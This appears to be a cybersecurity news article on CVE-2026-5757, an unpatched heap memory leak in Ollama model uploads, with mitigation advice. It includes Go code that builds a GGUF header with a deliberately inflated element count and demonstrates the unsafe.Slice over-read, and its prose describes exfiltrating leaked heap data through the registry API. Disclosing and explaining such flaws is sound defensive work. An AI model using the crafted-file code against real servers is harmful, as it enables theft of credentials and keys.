CVE-2026-5757: Critical Unauthenticated Heap Memory Leak in Ollama Model Uploads

2026-04-24 11:10:02 · Author: cybersecuritynews.com

A critical, unpatched vulnerability has been discovered in Ollama, a widely used open-source platform for running Large Language Models locally.

Tracked as CVE-2026-5757, this severe memory leak allows unauthenticated remote attackers to extract sensitive data directly from a server’s heap.

Discovered by security researcher Jeremy Brown via AI-assisted vulnerability research and disclosed publicly on April 22, 2026, the exploit targets the platform’s model upload interface.

Because the developers have not yet released a software update, administrators must actively secure their deployments to prevent unauthorized access.

AI Model Quantization Risks

Ollama is designed to help developers run resource-intensive AI models on standard hardware across Windows, macOS, and Linux.

To make this possible, the platform relies on a compression technique called model quantization, which reduces the AI model’s mathematical precision to save memory and processing power.
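To illustrate the idea, here is a minimal symmetric int8 quantizer in Go. This is a sketch of the general technique (per-tensor scale, rounding to one byte per weight), not Ollama's actual quantization engine:

```go
package main

import (
	"fmt"
	"math"
)

// quantizeInt8 compresses float32 weights to int8 using symmetric
// linear quantization: each value is divided by a per-tensor scale
// and rounded, shrinking storage from 4 bytes per weight to 1.
func quantizeInt8(weights []float32) (q []int8, scale float32) {
	var maxAbs float32
	for _, w := range weights {
		if a := float32(math.Abs(float64(w))); a > maxAbs {
			maxAbs = a
		}
	}
	if maxAbs == 0 {
		return make([]int8, len(weights)), 1
	}
	scale = maxAbs / 127 // map [-maxAbs, maxAbs] onto [-127, 127]
	q = make([]int8, len(weights))
	for i, w := range weights {
		q[i] = int8(math.Round(float64(w / scale)))
	}
	return q, scale
}

func main() {
	weights := []float32{0.9, -1.27, 0.05, 0.0}
	q, scale := quantizeInt8(weights)
	fmt.Println(q, scale)
}
```

The trade-off is precision for size: the model's weights are approximated, but a 4x smaller tensor fits on commodity hardware.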

While highly efficient, Ollama’s quantization engine has a fatal flaw in how it handles incoming file uploads. Hackers can exploit this process by deliberately manipulating the metadata hidden inside the model files.

The attack begins when a malicious actor uploads a specially crafted GPT-Generated Unified Format (GGUF) file to the targeted server.
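The crafted file's trick is a mismatch between what the metadata declares and what the payload contains. The sketch below builds a GGUF-style header whose declared element count vastly exceeds the bytes that follow; the field layout (magic, version, tensor count, metadata-KV count, element count) is a simplified illustration, not a byte-exact GGUF writer:

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
)

// craftHeader builds a minimal GGUF-style header whose declared tensor
// element count is far larger than the payload that follows it.
func craftHeader(declaredElems uint64, payload []byte) []byte {
	var buf bytes.Buffer
	buf.WriteString("GGUF")                                // magic
	binary.Write(&buf, binary.LittleEndian, uint32(3))     // version
	binary.Write(&buf, binary.LittleEndian, uint64(1))     // tensor count
	binary.Write(&buf, binary.LittleEndian, uint64(0))     // metadata KV count
	binary.Write(&buf, binary.LittleEndian, declaredElems) // inflated element count
	buf.Write(payload)                                     // only a few real bytes
	return buf.Bytes()
}

func main() {
	// Claim one million float32 elements but ship only 16 bytes:
	// a parser that trusts declaredElems will read ~4 MB past the data.
	f := craftHeader(1_000_000, make([]byte, 16))
	fmt.Printf("file size: %d bytes, declared data: %d bytes\n",
		len(f), 1_000_000*4)
}
```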

This upload triggers a dangerous combination of three distinct software failures that expose memory, plus a final step that carries the stolen data out:

  • The engine skips proper bounds checking, blindly trusting the file’s metadata instead of verifying that the stated element count matches the actual data size.
  • The system performs unsafe memory access via Go’s unsafe.Slice function, allowing the application to read far past the legitimate data buffer and into the server’s heap.
  • The server inadvertently writes this leaked heap data into a new model layer, creating a hidden but highly effective data exfiltration path.
  • The attacker utilizes Ollama’s built-in registry API to easily push this newly created, data-filled layer to their own external server.
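The core of this chain, a trusted element count feeding unsafe.Slice, can be sketched in Go as follows. This is an illustrative reconstruction of the bug class and its straightforward fix, not Ollama's actual code; the "secret" adjacent bytes stand in for neighboring heap memory:

```go
package main

import (
	"fmt"
	"unsafe"
)

// parseTensor mimics the flawed pattern: it trusts a metadata-supplied
// element count and builds a slice with unsafe.Slice, never checking
// that the count matches the real buffer length.
func parseTensor(data []byte, declaredCount int) []byte {
	return unsafe.Slice(&data[0], declaredCount) // no bounds check
}

// parseTensorSafe is the fix: reject counts exceeding the data present.
func parseTensorSafe(data []byte, declaredCount int) ([]byte, error) {
	if declaredCount < 0 || declaredCount > len(data) {
		return nil, fmt.Errorf("element count %d exceeds %d bytes of data",
			declaredCount, len(data))
	}
	return data[:declaredCount], nil
}

func main() {
	// One allocation: 8 bytes of "tensor data" followed by a secret
	// that stands in for adjacent heap memory.
	backing := append(make([]byte, 8), []byte("SECRETKEY")...)
	tensor := backing[:8] // the only bytes the parser should see

	leaked := parseTensor(tensor, 8+9) // metadata lies about the count
	fmt.Printf("leaked adjacent memory: %q\n", leaked[8:])

	if _, err := parseTensorSafe(tensor, 8+9); err != nil {
		fmt.Println("fixed parser:", err)
	}
}
```

On a real server the over-read lands in live heap pages, which is how credentials and keys end up inside the attacker's model layer.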

Heap memory can contain highly sensitive system information, including encryption keys, user credentials, API tokens, and private user prompts.

Exposing this data can lead to complete system compromise and allow attackers to establish stealthy, long-term persistence within a corporate network.

Since the vendor was unreachable during the disclosure process, no official software patch exists to fix the underlying code flaw.

According to CERT/CC, security teams must rely on immediate defensive mitigations to protect their infrastructure.

  • Turn off the model upload functionality entirely if it is not strictly required for your daily operations.
  • Restrict upload interface access to trusted local networks and actively block all untrusted external IP addresses.
  • Accept model uploads exclusively from verified, highly trusted sources to prevent malicious files from entering your pipeline.


Abinaya

Abi is a Security Editor and reporter with Cyber Security News. She covers cybersecurity incidents happening across cyberspace.


Source: https://cybersecuritynews.com/hackers-exploit-ollama-model/